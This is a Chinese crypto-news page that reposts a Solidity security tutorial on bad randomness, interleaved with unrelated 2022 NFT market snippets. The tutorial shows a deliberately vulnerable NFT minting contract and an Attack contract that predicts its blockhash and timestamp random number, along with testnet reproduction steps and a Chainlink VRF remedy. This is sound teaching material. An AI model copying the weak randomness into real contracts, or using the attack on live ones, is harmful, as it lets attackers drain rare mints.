以太坊價格 以太坊價格
Ctrl+D 以太坊價格
ads
首頁 > USDC > Info

WTF Solidity 合約安全: S07. 壞隨機數

Author:

Time:1900/1/1 0:00:00

我最近在重新學solidity,鞏固一下細節,也寫一個“WTF Solidity極簡入門”,供小白們使用(編程大佬可以另找教程),每周更新1-3講。

這一講,我們將介紹智能合約的壞隨機數(Bad Randomness)漏洞和預防方法,這個漏洞經常在 NFT 和 GameFi 中出現,包括 Meebits,Loots,Wolf Game等。

很多以太坊上的應用都需要用到隨機數,例如NFT隨機抽取tokenId、抽盲盒、gamefi戰斗中隨機分勝負等等。但是由于以太坊上所有數據都是公開透明(public)且確定性(deterministic)的,它沒有其他編程語言一樣給開發者提供生成隨機數的方法,例如random()。很多項目方不得不使用鏈上的偽隨機數生成方法,例如 blockhash() 和 keccak256() 方法。

壞隨機數漏洞:攻擊者可以事先計算這些偽隨機數的結果,從而達到他們想要的目的,例如鑄造任何他們想要的稀有NFT而非隨機抽取。更多的內容可以閱讀 WTF Solidity極簡教程 第39講:偽隨機數。

Web3開源大學WTF Academy獲得Starkware資助,將合作開發ZK和Cairo開源教程:11月5日,據官方消息,Web3開源大學WTF Academy獲得以太坊二層擴容方案Starkware的資助,將合作開發ZK和Cairo的中英文開源教程,為以太坊和Layer2培養更多開發者。據介紹,WTF Academy是一個Web3開源學院,提供免費開源Web3技術教程,目前WTF Solidity極簡教程已經更新50講。據此前消息,WTF Academy發布習題測試和鏈上技能認證模塊,并已開啟公測。[2022/11/5 12:19:54]

下面我們學習一個有壞隨機數漏洞的 NFT 合約: BadRandomness.sol。

contract BadRandomness is ERC721 {    uint256 totalSupply;    // 構造函數,初始化NFT合集的名稱、代號    constructor() ERC721("", ""){}    // 鑄造函數:當輸入的 luckyNumber 等于隨機數時才能mint    function luckyMint(uint256 luckyNumber) external {        uint256 randomNumber = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))) % 100; // get bad random number        require(randomNumber == luckyNumber, "Better luck next time!");        _mint(msg.sender, totalSupply); // mint        totalSupply++;    }}它有一個主要的鑄造函數 luckyMint(),用戶調用時輸入一個 0-99 的數字,如果和鏈上生成的偽隨機數 randomNumber 相等,即可鑄造幸運 NFT。偽隨機數使用 blockhash 和 block.timestamp 聲稱。這個漏洞在于用戶可以完美預測生成的隨機數并鑄造NFT。

goblintown.wtf系列NFT24小時交易額為151.15萬美元:金色財經消息,據NFTGo.io數據顯示,goblintown.wtf系列NFT總市值達5353.65萬億美元,在所有NFT項目總市值排名中位列第42;其24小時交易額為151.15萬美元,增幅達22.03%。截止發稿時,該系列NFT當前地板價為2.95,跌幅達33.11%ETH。[2022/6/15 4:28:57]

下面我們寫個攻擊合約 Attack.sol。

contract Attack {    function attackMint(BadRandomness nftAddr) external {        // 提前計算隨機數        uint256 luckyNumber = uint256(            keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))        ) % 100;        // 利用 luckyNumber 攻擊        nftAddr.luckyMint(luckyNumber);    }}攻擊函數 attackMint()中的參數為 BadRandomness合約地址。在其中,我們計算了隨機數 luckyNumber,然后將它作為參數輸入到 luckyMint() 函數完成攻擊。由于attackMint()和luckyMint()將在同一個區塊中調用,blockhash和block.timestamp是相同的,利用他們生成的隨機數也相同。

goblintown.wtf系列NFT24小時交易額為102.41萬美元:金色財經消息,據NFTGo.io數據顯示,goblintown.wtf系列NFT總市值達6238萬美元,在所有NFT項目總市值排名中位列第39;其24小時交易額為102.41萬美元,跌幅達9.35%。截止發稿時,該系列NFT當前地板價為3.15ETH,跌幅為26.01%。[2022/6/12 4:19:11]

由于 Remix 自帶的 Remix VM不支持 blockhash函數,因此你需要將合約部署到以太坊測試鏈上進行復現。

部署 BadRandomness 合約。

部署 Attack 合約。

將 BadRandomness 合約地址作為參數傳入到 Attack 合約的 attackMint() 函數并調用,完成攻擊。

調用 BadRandomness 合約的 balanceOf 查看Attack 合約NFT余額,確認攻擊成功。

goblintown.wtf NFT系列地板價突破8ETH,24小時交易額排名達到第一:金色財經消息,據OpenSea數據顯示,goblintown.wtf NFT系列地板價突破8ETH,目前為8.2ETH,24小時的交易額為4997.18ETH,24小時交易額在OpenSea排名達到第一。[2022/6/2 3:58:03]

我們通常使用預言機項目提供的鏈下隨機數來預防這類漏洞,例如 Chainlink VRF。這類隨機數從鏈下生成,然后上傳到鏈上,從而保證隨機數不可預測。更多介紹可以閱讀 WTF Solidity極簡教程 第39講:偽隨機數。

這一講我們介紹了壞隨機數漏洞,并介紹了一個簡單的預防方法:使用預言機項目提供的鏈下隨機數。NFT 和 GameFi 項目方應避免使用鏈上偽隨機數進行抽獎,以防被黑客利用。

推特:@0xAA_Science|@WTFAcademy_

社區:Discord|微信群|官網 wtf.academy

fees.wtf回應低流動性:團隊正在逐步增加流動性以防止機器人搶跑:1月14日消息,Gas 使用統計查詢網站 fees.wtf 在 Discord 社群中回應關于流動性不足的問題,并表示其在發布前提到將在發布不久之后添加流動性,但并未說明具體數量。是因為團隊不希望機器人搶先運行,并提走全部原有流動性。因此導致市場上發生了一場機器人對機器人的斗爭:

由于初始發布時的流動性很低,有機器人將 100 ETH 投入一個僅有 1 到 2 個 ETH 的流動性池中。設置很高的滑點,最終被其他機器人耗盡了全部的 ETH,是一個高滑點、低流動性的案例。

fees.wtf 團隊希望用戶沒有受到影響,一起仍按原計劃進行,團隊正在增加流動性。[2022/1/14 8:48:44]

所有代碼和教程開源在github: github.com/AmazingAng/WTFSolidity

來源:bress

Bress

個人專欄

閱讀更多

金色早8點

比推 Bitpush News

Foresight News

PANews

Delphi Digital

區塊鏈騎士

深潮TechFlow

鏈捕手

區塊律動BlockBeats

DeFi之道

Tags:BSPNBSINTNFTBSP價格nbs幣最新消息MINTY價格KAMAX Vault (NFTX)

USDC
PAR:淡馬錫、Paradigm等頂級風投基金在FTX中損失了多少錢

FTX 的危機,不僅讓客戶「陷入困境」,投資人也遭受重創,FTX 最高估值為 320 億美元,累計融資達到 18 億美元,其中不乏國際頂尖風投機構.

1900/1/1 0:00:00
NBS:教你如何識別、分析和避免NFT「洗盤交易」

原文標題:《如何識別 NFT「洗盤交易」?》對金融人士來說,「洗盤交易」(wash trading)并不是一個新詞.

1900/1/1 0:00:00
TOKEN:近期規模最大Rug Pull Flare卷款1850萬美元事件分析

北京時間2022年11月13日23:31:28 ,CertiK Skynet天網監測到Flare項目價格跌幅超過95%。經CertiK安全團隊調查,已確認該項目為Rug Pull騙局項目.

1900/1/1 0:00:00
區塊鏈:金色觀察 | 比特幣的隱私性為何重要

文/Julian,wasabiwallet;譯/金色財經xiaozou比特幣正走在大規模采用的征途中。但許多人還不明白,隨著這一技術的成功發展和擴張,國家和個人之間的關系將發生顛覆性變化.

1900/1/1 0:00:00
AIG:AIGC:Web3時代的生產力工具

摘要 在我們《元宇宙(七):虛擬人的“靈魂”是什么?》的報告中,提到了虛擬人的靈魂并不僅是逼真的外表,而是來自于AI自主生成的內容.

1900/1/1 0:00:00
REU:以太坊有可能成為“百年老字號”嗎?淺析 L1 和 L2 的可持續性問題

原文:《Sustainability》by polynya 編譯:西早先生 可持續性可以簡單地定義為協議保持在線,能抵擋黑客攻擊,并且在所有條件下都可以使用.

1900/1/1 0:00:00
ads